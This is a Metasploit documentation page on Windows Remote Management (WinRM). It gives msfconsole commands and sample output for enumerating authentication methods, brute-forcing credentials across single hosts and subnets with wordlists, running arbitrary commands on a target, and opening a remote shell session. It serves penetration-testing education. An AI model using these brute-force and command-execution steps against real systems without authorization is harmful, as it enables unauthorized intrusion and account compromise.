-
Notifications
You must be signed in to change notification settings - Fork 14.1k
Metasploit Guide WinRM
Windows Remote Management (WinRM), is a way for clients to remotely manage Windows computers. WinRM is built on top of the Simple Object Access Protocol (SOAP) over HTTP(S).
There are two main ports for WinRM:
- 5985/TCP - HTTP
- 5986/TCP - HTTPS
Important: Before running the chosen WinRM Metasploit module, first ensure that the RPORT and SSL values are configured correctly.
Either with the modern inline option support:
use scanner/winrm/winrm_auth_methods
run http://192.168.123.139:5985
run https://192.168.123.139:5986
Or by manually setting options:
use scanner/winrm/winrm_auth_methods
set RHOST 192.168.123.139
set RPORT 5985
set SSL false
run
Metasploit has support for multiple WinRM modules, including:
- Authentication enumeration
- Verifying/bruteforcing credentials
- Running commands and opening sessions
There are more modules than listed here, for the full list of modules run the search command within msfconsole:
msf6 > search winrm
The WinRM modules work against Windows instances which have WinRM installed and configured.
For a domain controller the Allow remote server management through WinRM policy will need be enabled.
It is only possible to use WinRM against accounts which are part of the Remote Management Users group.
WinRM over HTTPS requires the creation of a Server Authenticating Certificate, as well as enabling the transport mode:
winrm quickconfig -transport:https
Enumerate WinRm authentication mechanisms:
use scanner/winrm/winrm_auth_methods
run http://192.168.123.139:5985
run https://192.168.123.139:5986
Example:
msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985
[+] 192.168.123.139:5985: Negotiate protocol supported
[+] 192.168.123.139:5985: Kerberos protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Brute-force host with known user and password list:
use scanner/winrm/winrm_login
run https://[email protected]:5986 threads=50 pass_file=./wordlist.txt
Brute-force credentials:
use scanner/winrm/winrm_login
run http://192.168.123.139:5985 threads=50 user_file=./users.txt pass_file=./wordlist.txt
Brute-force credentials in a subnet:
use scanner/winrm/winrm_login
run cidr:/24:http://user:[email protected]:5985 threads=50
run cidr:/24:http://[email protected]:5985 threads=50 pass_file=./wordlist.txt
To execute arbitrary commands against a windows target:
use scanner/winrm/winrm_cmd
run http://user:[email protected]:5985 cmd='whoami; ipconfig; systeminfo'
If you have valid credentials the scanner/winrm/winrm_login module will open a Metasploit session for you:
use scanner/winrm/winrm_login
run http://user:[email protected]:5985
Example:
msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:[email protected]:5985
[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.139:5985 - Login Successful: WORKSTATION\user:pass
[*] Command shell session 7 opened (192.168.123.1:58673 -> 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 7...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\user>
- Home Welcome to Metasploit!
- Using Metasploit A collection of useful links for penetration testers.
-
Setting Up a Metasploit Development Environment From
apt-get installtogit push. - CONTRIBUTING.md What should your contributions look like?
- Landing Pull Requests Working with other people's contributions.
- Using Git All about Git and GitHub.
- Contributing to Metasploit Be a part of our open source community.
- Meterpreter All about the Meterpreter payload.